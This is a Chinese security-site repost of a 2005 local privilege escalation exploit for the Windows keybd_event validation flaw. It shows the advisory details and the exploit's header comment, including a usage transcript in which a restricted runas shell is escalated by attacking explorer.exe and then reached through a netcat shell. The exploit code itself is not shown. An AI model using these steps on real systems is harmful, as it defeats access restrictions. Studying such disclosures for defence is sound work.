Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

文章介绍了Microsoft Windows的keybd_event验证漏洞,危险程度中等,影响Windows 2000/XP/2003系统,暂无解决方案。攻击者可利用无效键盘输入验证,通过发送快捷键执行代码、提升权限,绕过安全限制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章整理:天天安全网   作者:佚名   发布时间:2005-09-09

漏洞资料:http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
危险程度:中等
影响范围:Microsoft Windows 2000/XP/2003
解决办法:暂时没有解决方案

------------------------------------------------------------------------------

/*
* Microsoft Windows keybd_event validation vulnerability.
* Local privilege elevation
*
* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
* I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
*
* Platforms afected/tested:
*
* - Windows 2000
* - Windows XP
* - Windows 2003
*
*
* Original Advisory: http://www.haxorcitos.com
* http://www.reversing.org
*
* Exploit Date: 08 / 06 / 2005
*
* Orignal Advisory:
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Attack Scenario:
*
* a) An attacker who gains access to an unprivileged shell/application executed
* with the application runas.
* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
*
* Impact:
*
* Due to an invalid keyboard input validation, its possible to send keys to any
* application of the Desktop.
* By sending some short-cut keys its possible to execute code and elevate privileges
* getting loggued user privileges and bypass runas/service security restriction.
*
* Exploit usage:
*
* C:/>whoami
* AQUARIUS/Administrador
*
* C:/>runas /user:restricted cmd.exe
* Enter the password for restricted:
* Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
*
*
* Microsoft Windows 2000 [Version.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:/WINNT/system32>cd /
*
* C:/>whoami
* AQUARIUS/restricted
*
* C:/>tlist.exe |find "explorer.exe"
* 1140 explorer.exe Program Manager
*
* C:/>c:/keybd.exe 1140
* HANDLE Found. Attacking =)
*
* C:/>nc localhost 65535
* Microsoft Windows 2000 [Versi

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值